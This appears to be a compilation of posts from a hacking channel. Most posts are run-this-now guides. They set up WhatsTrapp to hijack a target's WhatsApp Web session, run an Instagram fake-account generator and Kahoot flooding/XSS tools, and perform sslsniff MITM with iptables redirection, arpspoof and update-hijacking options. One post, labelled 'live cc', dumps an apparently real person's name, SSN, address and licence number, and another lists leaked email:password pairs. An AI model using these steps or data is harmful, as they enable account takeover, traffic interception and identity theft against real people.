▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 WHATSAPP HACKING updated✅

WhatsTrapp uses a Man In the Middle (MITM) attack to establish a session with the WhatsApp's target: once the session has been established, actions for retrieving and collecting the data are executed in the browser context by using the very same WhatsApp Web's APIs (thank to a bit of reverse engineering).

🦑REQUIREMENTS :

Docker
Docker Compose

🦑git clone git@github.com:Wicker25/whatstrapp.git

1) $ cd whatstrapp/

2) Launch the WhatsTrapp server with:

$ docker-compose up
Then open your browser at http://127.0.0.1:8025/ and wait until the QR code has been loaded.

3) Launch the target's WhatsApp and, from the main menu, select "WhatsApp Web

4) If you are trying to use WhatsTrapp on a GNU/Linux operating system you might need to increase the kernel parameter max_map_count by running:

# sysctl -w vm.max_map_count=262144

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑=SOME CONTRIES HAVE TROUBLE LOADING YOUTUBE VIDEOS.. DUE TO SYSTEM maintenance- NOT DDOS

🦑 live cc

Name: Nikkia A Alexander
SSN: 359846918
Address: 106 Simca Ln
Apt: 6
State: Delaware
City: Wilmington
ZipCode: 19805
Born In: Chicago , IL
DL Number: 1812659061
Past address: 1210 W 109th St
Chicago IL 60643

🦑 IP VANISH VPN✅

ms.nikki16@yahoo.com: 020406Mia

lisaboo43224@yahoo.com:happy123

🦑 pastebin.com/xWQ6kfsQ

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CREATE UNLIMITED INSTAGRAM ACCOUNTS:
t.me/UndercodeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/kaex/Insta-mass-account-creator.git

2) cd Insta-mass-account-creator

3) Example: php start.php -l 5 -p proxies.txt

4)t his script creates account with random name and username gets by the web. All user created are older 18 years

5) This script helps you follow multiple accounts with the account's you've created
Important

6) The new fake Instagram account with an unverified phone number after ~ 1-24 hours could not do any requests. All requests will be redirected to the page
https://instagram.com/challenge

🦑 TESTED BY UNDERCODE

> debian-parrot-kali

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 INSTAGRAM FOLLOW EDITING & trackers APPS ios - android

we send before many sitres for inst follow- now customize your post and convert to amazing one:

> https://vsco.co/

>https://priime.com/

>https://itunes.apple.com/us/app/snapseed/id439438619?mt=8

> https://pixlr.com/

> https://itunes.apple.com/us/app/litely/id850707754?mt=8

> https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8

> https://www.crowdfireapp.com/

>https://itunes.apple.com/us/app/tracker-for-instagram-analyze-followers-likes/id1246192822?mt=8

> https://itunes.apple.com/us/app/followers-likes-on-instagram/id862228531?mt=8

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ iｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑top rated Instagram Apps for Followers 2020 :
ios-
we send before many sites for follow now it'sapps turn
t.me/iUndercode


>https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8

> https://itunes.apple.com/us/app/social-rocket-for-instagram-get-followers-report/id1210349595?mt=8


> https://www.crowdfireapp.com/

> https://itunes.apple.com/us/app/tracker-for-instagram-analyze-followers-likes/id1246192822?mt=8

▁ ▂ ▄i ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Reverse engineering termux-linux :
t.me/UndercodeTesting

1) kahoot-flood - using an old school denial of service technique, this program automatically joins a game of kahoot an arbitrary number of times. For instance, you can register the nicknames "alex1", "alex2", ..., "alex100".
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-flood

2) kahoot-rand - connect to a game an arbitrary number of times (e.g. 100) and answer each question randomly. If you connect with enough names, one of them is bound to win.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-rand

3) kahoot-profane - circumvent Kahoot's profanity detector, allowing you to join with any nickname (but with extra length restrictions; it has to be short).
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-profane

4) kahoot-play - play kahoot regularly—as if you were using the online client.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-play

5) kahoot-html - I have notified Kahoot and they have fixed this issue. It used to allow you to join a game of kahoot a bunch of times with HTML-rich nicknames. This messes with the lobby of a kahoot game. See the screenshot in the example section.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-html

6) kahoot-crash - trigger an exception on the host's computer. This no longer prevents the game from functioning, so it is a rather pointless "hack"
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-crash

7) kahoot-xss - since I discovered this security hole, I contacted Kahoot and they fixed it. This used to run arbitrary JavaScript code on the host's computer. This exploited a bug with the pre-game player list, which did not sanitize HTML tags. The exploit itself was rather complicated due to the fact that nicknames are limited to 15 characters.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-xss

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) First, you must have the Go programming language INSTALLED on your machine.

Once you have Go installed and a GOPATH configured, you can use the following command to install the dependencies:

2) go get github.com/gorilla/websocket

🦑 Android
Download Termux on Android device and type this command line:

> apt update

> apt install curl

> curl https://raw.githubusercontent.com/unixpickle/kahoot-hack/master/kh-tmux-setup.sh
> kh-tmux-setup.sh

>chmod +x kh-tmux-setup.sh

> ./kh-tmux-setup.sh

✅ verified by undercoder

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission

OFFICIAL NSA SITE:

> https://www.ghidra-sre.org/ghidra_9.1.2_PUBLIC_20200212.zip

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Software reverse engineering by NSA

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) Extract the JDK: dl

2) Right-click on the zip file and click Extract All...

3) Click Extract

4) Open Environment Variables window:

5) Windows 10: Right-click on Windows start button, and click System

Windows 7: Click Windows start button, right-click on Computer, and click Properties

6) Click Advanced system settings

7) Click Environment variables...

8) Add the JDK bin directory to the PATH variable:

9) Under System variables, highlight Path and click Edit...

10) At the end of the the Variable value field, add a semicolon followed by <path of extracted JDK dir>\bin
Click OK
Click OK
Click OK

11) Restart any open Command Prompt windows for changes to take effect
Linux and macOS (OS X): Extract the JDK distribution (.tar.gz file) to your desired location, and add the JDK's bin directory to your PATH:

12) Extract the JDK:
tar xvf <JDK distribution .tar.gz>

13) Open ~/.bashrc with an editor of your choice. For example:
vi ~/.bashrc

14) At the very end of the file, add the JDK bin directory to the PATH variable:
export PATH=<path of extracted JDK dir>/bin:$PATH
Save file

15) Restart any open terminal windows for changes to take effect

🦑In some cases, you may want Ghidra to launch with a specific version of Java instead of the version that Ghidra automatically locates. To force Ghidra to launch with a specific version of Java, set the JAVA_HOME_OVERRIDE property in the support/launch.properties file. If this property is set to an incompatible version of Java, Ghidra will revert to automatically locating a compatible version. Note that some Java must still be on the PATH in order for Ghidra to use the JAVA_HOME_OVERRIDE property. This limitation will be addressed in a future version of Ghidra.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOP RATED 2020 FACEBOOK LIKER APPS :
FOR ANDROID

> https://fb-liker.en.uptodown.com/android

> https://play.google.com/store/apps/details?id=com.nam.fbwrapper&hl=en_US

> https://apental.com/

> https://www.facebook.com/apentalcalcdownload/

> https://play.google.com/store/apps/details?id=com.Plop.Fast.Followers.Boost.Get.Instant.Likes&hl=en_US


🦑 FOR IOS :

https://apps.apple.com/us/app/swipa-likes-for-photos/id1231810985

http://ios.dailydownloaded.com/en/internet-software/social-networking-software/23891-myfbliker-auto-like-download-install

https://apkpure.com/fboost-likes-for-facebook-quick-and-easy-guide/com.fboost_app

🦑 2020 NEWS SITES / APPS NON VERIFIED HIGH RATED :

> https://apkpure.com/get-instant-likes/socials.com.application

> http://mylikelo.com/


By
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CIA TOOL- GodMode9 Explorer - A full access file browser for the Nintendo 3DS console :godmode:
T.me/UndercodeTesting

🦑 The recommended bootloader for use with GodMode9 is fastboot3DS. There are known issues for some users when using the standard setup based on boot9strap and Luma3DS. If you insist on using that setup follow the instructions found in a certain guide. Here's how to set up GodMode9 (and fastboot3DS) up quickly:

1) Download OpenFirmInstaller and follow the quick setup instructions found there.
> https://github.com/d0k3/GodMode9

2) Copy the gm9 folder from the release archive to your SD card. Then, get good versions of seeddb.bin and encTitleKeys.bin from somewhere (don't ask me!) and put these two files into sd:/gm9/support (optional but recommended for full functionality).
It is also recommended you setup the RTC clock if you're running GodMode9 for the first time.

3) Find the option via HOME button -> More.... Also keep in mind that you should fix your system OS clock afterwards. While you're in the More... menu, you may also set screen brightness to a fixed value of your choosing and manually calibrate the touch screen (not recommended - try the automatic configuration first).
Helpful hint #1: Go here for step by steps on doing some common tasks in GodMode9. Especially users coming from Decrypt9WIP or Hourglass9 may find this to be helpful.
Helpful hint #2: Never unlock the red write permission level unless you know exactly what you're doing.

4) You will notice that prompt when it comes up, it features a completely red screen. It is recommended you stay on the yellow permission level or below at all times to be completely safe. Also read more on the write permissions system below.

🦑<A> button: The <A> button is the 'confirm' / 'choose' button. It confirms prompts and selects entries in menus. In the main file view, it pulls up a submenu for files and opens directories (use <R+A> on directories for a submenu, also including the invaluable title search). In the hexviewer, <A> switches into edit mode.

<B> button: The <B> button is the 'cancel' / 'return' button. Use it to leave menus without action, hold it on file operations to cancel said file operations.

<X> button: In the main file view, the <X> button deletes (marked) files. With <R+X> files are renamed.

<Y> button: In the main file view, the <Y> button copies and pastes files. With <R+Y> you can create folders and dummy files.

<L> button: The <L> button is the 'mark' button. Use it with <LEFT> / <RIGHT> to mark / unmark all files in a folder, hold it and use <UP> / <DOWN> to select multiple files.

<R> button: The <R> button is the 'switch' button. It switches buttons to their secondary function. Notable exceptions are <R+L> for a screenshot (works almost anywhere),

<R+LEFT> / <R+RIGHT> to switch panes and <R+DOWN> to reload the file listing.

<START> button: Use the <START> button to reboot from GodMode9. Use <R+START> to poweroff your 3DS.

<SELECT> button: The <SELECT> button clears or restores the clipboard (depending on if it's empty or not).

<HOME> button: The <HOME> button enters the HOME menu, including the scripts / payloads submenus, options for formatting the SD, setting the RTC, and more. The

<POWER> button is an alternative way of entering the HOME menu.

<R+UP> combo: This little known keycombo, when held at startup, pauses the GodMode9 boot so that you can stare at the splash screen for a little longer.

<R+LEFT> combo: If you have installed GodMode9 as your bootloader, this keycombo enters the bootmenu. Hold on startup! If you built GodMode9 as SALTMODE and have it as a bootloader, the keycombo is simply the <START> button.

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK WIFI AIRPLANE
> Using SSH through airplane WiFi that blocks port 22
instagram.com/UndercodeTesting

1) Many aircraft that offer wifi only permit access to machines on port 80/443, the standard http(s) ports. If you want to SSH, you have to set up an intermediate machine that hosts the SSH service on either port 80 or 443. An easy (and free) way to do this is via a Google free-tier micro instance.

2) These instances have a 1 GB transfer ceiling per month, but so long are you are only transmitting textual data a few days per month, this limit should not be easily exceeded. Set up one of these VMs via the Google Cloud console, and select CentOS 7 as the disk image. Make sure that you allow http/https traffic on the instance, the two checkboxes in the Firewalls section of the VM settings.

3) Optionally, set a static external IP address for your server in the VM config, in case you don't want to look up the IP each time. Then, ssh into the new VM (the IP address will be listed as the "external IP" in the list of instances) and edit your /etc/ssh/sshd_config file, changing the Port 22 line to Port 80.

4) By default selinux will only allow the SSH service to use port 22, so you have to change your selinux permissions as well. Enter the following commands into the VM:

> sudo su

> semanage port -m -t ssh_port_t -p tcp 80

> firewall-cmd --permanent --zone=public --add-port=80/tcp

> firewall-cmd --reload

> systemctl restart sshd.service

> Make sure that SSH is listening on port 80:

ss -tnlp | grep ssh
Example output:

LISTEN 0 128 *:80 *:* users:(("sshd",pid=1895,fd=3))
LISTEN 0 128 :::80 :::* users:(("sshd",pid=1895,fd=4))
If so, log out and attempt to SSH into your server on the new port:

ssh 123.45.67.89 -p80

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑AUTOMATE MITM ATTACK- HACK ACC AND MORE...
T.me/UndercodeTesting

🦑REQUIRE :

openssl, libboost1.35-dev, libboost-filesystem1.35-dev,

libboost-thread1.35-dev, liblog4cpp5-dev, Linux 2.4/2.6 (or BSD)

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/moxie0/sslsniff.git

2) run "./configure" and "make". (You'll have
to make some changes to build on BSD systems, see below under "Setting up
pf")

🦑There are two ways to run this: in "authority" mode or "targeted" mode.

A) Authority Mode:

1) In this mode, sslsniff acts as if it is a CA which dynamically generates
certificates on the fly.
> If you were, for instance, able to obtain a CA
certificate somehow, you could run it in this mode and it would dynamically
create and sign new certificates for whatever site you're trying to connect
to.

2) This mode is also useful for exploiting implementations that do not properly
verify BasicConstraints, as any valid leaf node certificate could be used
instead of a CA cert.

3) You would run sslsniff as:
./sslsniff -a -s <$listenPort> -w <$logFile> -c <$caCert>

B) Targeted Mode:

1) In this mode, sslsniff is given a directory full of certificates, which it
uses for targeted MITM attacks against the hosts those certificates are
signed for.

2) This mode is useful if you are able to forge specific
certificates, or if you have certificates that were obtained for the "null
prefix" vulnerability that I published. There are sample null prefix
certificates in the "certs" directory that comes with sslsniff, but be
sure to specify "-m IPSCACLASEA1.crt" if you wish to use those. (Note:
the targeted certs have been removed for legal reasons, but the universal
wildcard cert remains)

3) You would run sslsniff as:
./sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt \
-c <$certDir>


@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MITM AUTO Other options:

* sslsniff can be configured to only attack certain clients. In this case,
you need to specify -f <ff,ie,safari,opera> -h <$httpListenPort>

* sslsniff can be configured to deny OCSP requests from clients. In this
case, you need to specify -d

* sslsniff can be configured to only log HTTP POSTS. In this case, you
need to specify -p

* sslsniff can be configured to hijack Mozilla auto-updates. In this case,
you need to specify -u <$updateXmlDir>, where $updateXmlDir contains the
XML files for whatever binaries you want to have sslsniff auto-update,
one for each platform. There are sample XML files in the "update"
directory that comes with sslsniff.

* sslsniff can be configured to hijack Firefox/Thunderbird addon
auto-updates. In this case, you need to specify -e <url> -j <sha256sum>
where <url> is the URL where your custom addon is located, and <sha256sum>
is the sha256sum of that addon.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 AUTO MITM SETTING UP :
Setting up iptables
-------------------

1) Flip your machine into ip_forward mode
(echo 1 > /proc/sys/net/ipv4/ip_forward)

2) Add a rule to intercept HTTPS traffic
(iptables -t nat -A PREROUTING -p tcp --destination-port 443
-j REDIRECT --to-ports <$listenPort>)

3) If you're going to do client fingerprinting, add a rule to
intercept HTTP traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 80
-j REDIRECT --to-ports <$httpListenPort>)

4) Add a rule to intercept imaps traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 993 \
-j REDIRECT --to-ports <$listenPort>)

5) Add a rule to intercept pop3s traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 995 \
-j REDIRECT --to-ports <$listenPort>)

6) Add a rule to intercept irc over ssl traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 6697 \
-j REDIRECT --to-ports <$listenPort>)

🦑Setting up pf
-------------

1) Basic support for pf is now included. Set up firewall rules similar to
those above, and change util/Destination.cpp by undefining HAVE_NETFILTER
and defining HAVE_PF at the top.

🦑 Running arpspoof
--------------------------

1) Assuming we want to intercept SSL traffic from 172.17.10.36, we need to
trick that host into thinking that we're the router. Using arpspoof, we
can convince the target that the router's MAC address is our MAC address.

2) * arpspoof -i eth0 -t 172.17.10.36 172.17.8.1

At this point, any SSL traffic should get proxied by sslsniff and logged to
a file.


✅ VERIFIED BY UNDERCODE
@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 FULL AUTOMATE MITM ATTACK